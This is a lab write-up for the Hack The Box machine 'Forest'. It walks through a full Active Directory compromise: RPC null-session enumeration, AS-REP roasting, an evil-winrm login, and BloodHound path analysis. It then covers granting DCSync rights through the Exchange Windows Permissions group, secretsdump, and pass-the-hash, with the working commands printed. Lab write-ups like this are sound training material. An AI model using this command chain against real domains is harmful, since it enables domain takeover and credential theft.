Walkthrough

• Nmap
• Enumerate Users through RPC NullSession
• AS-REP Roast and Hash cracking
• Login with Evil-Winrm
• Domain enumeration with bloodhound
• ACL Abuse to grant DCSync permissions

Getting Foothold

Nmap

First of all I performed a nmap port scan to reveal all open ports

Kerberos Port 88 indicates that this box is a Windows Domain Controller

Further investigation of ldap port 389 reveils the machines hostname and also the domains FQDN. Both names were added to to the attackers /etc/hosts file.

Since there is no website running we are left with other services. I commonly start to look at the SMB, RPC and LDAP ports first.

Firstly I to logon using null sessions where I try to logon without a user and password. We can do RPC enumeration manually or using enum4linux.

For manual enumeration rpcclient is used and I was able to logon using a null session using the following command

rpcclient -U '' -N  forest.htb.local

To enumerate valid domain users the Command enumdomusers was used which revealed all domain users. Now I can create a username list with the gained information.

Now we have a list of valid usernames but no credentials. A password spray didnt got us more information, so the next thing I tried was AS-REP Roasting using impacket.

impacket-GetNPUsers htb.local/ -u usernames.txt -format hashcat -dc-ip 10.10.10.161

This resulted in getting a hash for the user svc-alfresco@htb.local

So I copied that hash into a local file and tried to crack it with hashcat using rockyou.txt

Cracking the hash was successful so we now have valid credentials for a domain user.

And after a quick check if we can authenticate to any service using this credentials it was confirmed that we now have winrm access to the machine.

Using evil-winrm we can now access the machine and retrieve the user flag

Escalating Privileges

The user doesnt have any interesting privileges but is a member of a few active directory groups. To explore the AD environment, SharpHound and Bloodhound was used.

Using evil-winrm the SharpHound dump was downloaded and afterwards uploaded into bloodhound.

Here we can already mark SVC-ALFRESCO@HTB.LOCAL as owned. Viewing its group memberships we can see that SVC-ALFRESCO@HTB.LOCAL is a member of the service accounts group SERVICE ACCOUNTS@HTB.LOCAL

This group is part of the group PRIVILEGED IT ACCOUNTS@HTB.LOCAL which is part of the Account Operators group ACCOUNT OPERATORS@HTB.LOCAL which is able to modify the EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group.

This group has permissions to write a DACL to the Domain which would allow us to give a certain user DCSync Rights.

So lets do it.

At first we need to modify the EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group and add a new user to this group. Since svc-alfresco is a member to ACCOUNT OPERATORS@HTB.LOCAL, he should be able to write the newly created user MHT into that group.

We can do this by issuing a simply net group command

net group "EXCHANGE WINDOWS PERMISSIONS"  MHT /add  /domain

After that we can add a new ACL to the Domain granting the new User MHT DCSync Rights.

net user MHT co3WrEIt  /add /domain
net group "EXCHANGE WINDOWS PERMISSIONS" MHT  /add /domain
$SecPassword = ConvertTo-SecureString 'co3WrEIt' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\\MHT', $SecPassword)
Add-DomainObjectAcl -TargetIdentity 'DC=htb,DC=local' -PrincipalIdentity MHT -Rights DCSync -PrincipalDomain htb.local -TargetDomain htb.local -Cred $Cred

And now we can DCSync with that credentilas resulting in fully owning the Domain.

impacket-secretsdump htb.local/MHT:co3WrEIt@10.10.10.161

Now that we have the Domain Administrators NTLM Hash we can use Pass-The-Hash to get Domain-Administrator Access and obtain root.txt

impacket-psexec htb.local/Administrator@10.10.10.161 -hashes :32693b11e6aa90eb43d32c72a07ceea6